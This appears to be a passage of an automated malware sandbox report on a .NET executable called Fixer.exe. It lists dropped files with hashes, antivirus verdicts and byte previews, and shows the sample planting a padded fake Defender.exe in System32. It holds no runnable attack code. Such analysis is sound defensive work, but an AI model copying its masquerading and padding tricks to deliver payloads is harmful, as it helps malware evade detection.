                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.4.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DD0.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4809
                                                                                                                                                                                                                                          Entropy (8bit):4.460536081322174
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs4Jg771I961WpW8VYGPYm8M4JC0qnZ9Fsyq8vz0qnZulrquH6d:uIjf+I75E7VXSJC0KZUWz0KZuAuH6d
                                                                                                                                                                                                                                          MD5:5E2C748439DAFF5BEC5E5DB6A90A2850
                                                                                                                                                                                                                                          SHA1:FA72D899ECD9B2AD5A62816F24353308D564BCFA
                                                                                                                                                                                                                                          SHA-256:34FDBA698C6E85AD2A6D00C08BBE31C88B3FAD56D95D56489EFAC284491F4384
                                                                                                                                                                                                                                          SHA-512:BE8476907658E251072CA110CCE37734935B48A113872A8ED396E5903348F7677C4E78779DA4D6F0FAD595C1F8BC48F2233459ED425253929FA6F8399ADAFB7E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666798" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA25.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Wed Jan 8 10:15:35 2025, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):384850
                                                                                                                                                                                                                                          Entropy (8bit):3.5975398844191937
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:hCILbLAnoLM4Im5cS9PdR5uDHJco4HqRhoMkxP1CCqmiGv3+vdb2bTA:bLbsnDhmp91R5uDHJco4khov/q63QdUc
                                                                                                                                                                                                                                          MD5:DA7C806F194BF5325AC71EF023536247
                                                                                                                                                                                                                                          SHA1:0A8D22DE5873729984AA9FFD49747DD1967F7F7D
                                                                                                                                                                                                                                          SHA-256:79FC06D9B16BDC525032A87A62CB0EC15E680BE04DCD187680AA5306931D9AA9
                                                                                                                                                                                                                                          SHA-512:026952772C3CC543365BB6E62AD71D92A1C2446275A9B6855897720C492EB02FD64EEC776B4CBEAAFFF9B0542A8E0F34BC99ADA144708ED4FB8B6D24EC5E0EB4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:MDMP..a..... .......GP~g........................ ...........$....%...........&.......>.. q..........l.......8...........T............6...............6...........7..............................................................................eJ.......8......Lw......................T...........CP~g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC2A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8802
                                                                                                                                                                                                                                          Entropy (8bit):3.697588222399438
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJVuJio6YEhl7xgmfZ8lAmpr089b+ZEfKPjKm:R6lXJsT6YEDNgmfulV+6fKPv
                                                                                                                                                                                                                                          MD5:5C06E445B62C298C3A338A71B7ED453C
                                                                                                                                                                                                                                          SHA1:7B449E4BEB999205286BE5FCD44D9BFCD0C46868
                                                                                                                                                                                                                                          SHA-256:098C9236ED69632F18F4E79A1404C1C923FC32283E80763DB7A9D56DF300B432
                                                                                                                                                                                                                                          SHA-512:18316E09113EFC7C72AD62909781BBB1BC3E0C914727EF21C9B397238F30895D44B5149C41F4E79299A5406068D6DE073FA9DA5A3B312211E724E00C3FEE704D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.8.4.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC69.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4809
                                                                                                                                                                                                                                          Entropy (8bit):4.461145211989504
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs4Jg771I961WpW8VYIYm8M4JC0qnZ9Fmyq8vz0qnZ/lrquH8d:uIjf+I75E7VoJC0KZuWz0KZ/AuH8d
                                                                                                                                                                                                                                          MD5:007943515DF8E89DBAE0D37510666E12
                                                                                                                                                                                                                                          SHA1:B2409219E3BCE10E14CAF816258F6402C380618E
                                                                                                                                                                                                                                          SHA-256:ECBED3A2F98DFCCB79497BC0A2CC8270B1193F8C99DE0B70F014ACD9EB129CE3
                                                                                                                                                                                                                                          SHA-512:1531BCB5FC334C45DBF9521922799E19A6D72D7E72C1F6625E694AF7FFD8F608AC44C5CDCFCBCF37BBD0003630CE0E32F62BE898BE09B47AF3A5A3A03B7B4CE4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666798" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6z9uno0baqvej0me.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):443
                                                                                                                                                                                                                                          Entropy (8bit):5.347274615985407
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
                                                                                                                                                                                                                                          MD5:F73EF0CF34F9748349B7DC26D23369A1
                                                                                                                                                                                                                                          SHA1:9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
                                                                                                                                                                                                                                          SHA-256:6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
                                                                                                                                                                                                                                          SHA-512:C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fixer.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):3094
                                                                                                                                                                                                                                          Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                          MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                                                                                          SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                                                                                          SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                                                                                          SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):471096
                                                                                                                                                                                                                                          Entropy (8bit):6.6645834957913985
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:G8qTx8oaV9Ta1UGwUVBRIYRrpyLvx5aatth:kaVVa+GwyHvlGv/jX
                                                                                                                                                                                                                                          MD5:83AB0FD4D723DF8D361E8AE748A01B21
                                                                                                                                                                                                                                          SHA1:DEFD49D2298BCD8A4E9D171061B15845DD689B3F
                                                                                                                                                                                                                                          SHA-256:0E73A04EC9945D13B86C8713D85B31CC2FC6A7010F9D2719DE7A6AD054FC3AE2
                                                                                                                                                                                                                                          SHA-512:5299F8A925C193DF061F570B869D4BAE15F8BF8D0873C2CC7EAA6B0A5B4ED73C8031D627D75B415E5C3F15390A5BA638EE232D8CF01EF8EEADB94A6AB5427CD4
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................n1... ...@....@.. ....................................@..................................1..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P1......H...........XD...............$...........................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\FixerNerest.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):398568
                                                                                                                                                                                                                                          Entropy (8bit):6.187865316789448
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:udqn92Oey3hWpanij1Ck6QQWFti9Ez2bDLujYzYm12JLXUsGytEqQ:uIn92O335ijomti9EzsOJL+UEq
                                                                                                                                                                                                                                          MD5:68A9294881810BC2CF709D03D710648D
                                                                                                                                                                                                                                          SHA1:7C8200CAF2A1A58FAB42936425DF7CC3B8378D49
                                                                                                                                                                                                                                          SHA-256:2B394B3A08381007F2121B096C08CE22CC9CA9085F0EE5E9CE931809D6F85FE5
                                                                                                                                                                                                                                          SHA-512:7C8143CA584819745C2625952E4EC9E668D02670C727E7F6AF09BA603C92B2369EF70C3AA2C3973D62CA574331A6B0C25F8D577B1F1FC08C3E0D33A307230EE9
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................./... ...@....@.. .......................@............@.....................................O....@..................H$... ....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B........................H........... _...........................................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                          C:\Windows\System32\Defender.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):750130408
                                                                                                                                                                                                                                          Entropy (8bit):0.007827226117135612
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                                                                          MD5:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          SHA1:317EEAB6C2474F22ABD152C5E1427974670AD5A0
                                                                                                                                                                                                                                          SHA-256:7E6F04675848A53E3F77B426F6C87876D683A8EF93AE8F78987C7C44FBA4B6F5
                                                                                                                                                                                                                                          SHA-512:0D76211440B429E4E31FBAAC79B8B8F905B9BDDA362AAE453825E88BE536059DDF079DB9E0E48645D83B13914DD4AF7C3220A8BC0A3057C6326D81F00A86659B
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................./... ...@....@.. .......................@............@.....................................O....@..................H$... ....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B........................H........... _...........................................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                          Entropy (8bit):4.422082030578936
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:bSvfpi6ceLP/9skLmb0OTaWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw:GvloTaW+EZMM6DFyz03w
                                                                                                                                                                                                                                          MD5:88F3BA12B389176141D0C9E35D6A0C30
                                                                                                                                                                                                                                          SHA1:930B0050FF79758950AC23A0E280355E8B575ECE
                                                                                                                                                                                                                                          SHA-256:E66DE6153A2E3471DCC8BD98FB5A4F3C39C9644CD2921AECA7670FAC9F6C7EDC
                                                                                                                                                                                                                                          SHA-512:892C4C32FF5EF27F14CD336DBFC933EFDE55F08DB0A239C0E1028173B612A198296C9EDBAA204476C28E9CCC4DAF457A2B6A7FA826A7E3F9BE13A9D02D33FEF3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~..A.a..............................................................................................................................................................................................................................................................................................................................................n..u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):5.081407378293017
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                          File name:Fixer.exe
                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                          MD5:2acda1f917022e9e8081ad69b15330c6
                                                                                                                                                                                                                                          SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
                                                                                                                                                                                                                                          SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
                                                                                                                                                                                                                                          SHA512:958b0298777807763a0abd44c7a9252838625a2cd73eda6537d7a453aa5ed434282dbec6a126899bb35912e1615fa4e77461a2c1b4f7912d91a35fb44b439d93
                                                                                                                                                                                                                                          SSDEEP:3072:icZqf7D34qp/0+mAGkyYaxQwgrRB1fA0PuTVAtkxza3R0eqiOL2bBOA:icZqf7DIqnm2lB1fA0GTV8kk8L
                                                                                                                                                                                                                                          TLSH:B5645A5833E8C910DA7F4775D861D67093B0BCA3A552E70B4FC4ACAB3D32740EA51AB6
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@................................

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:4d8ea38d85a38e6d

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x43029e
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
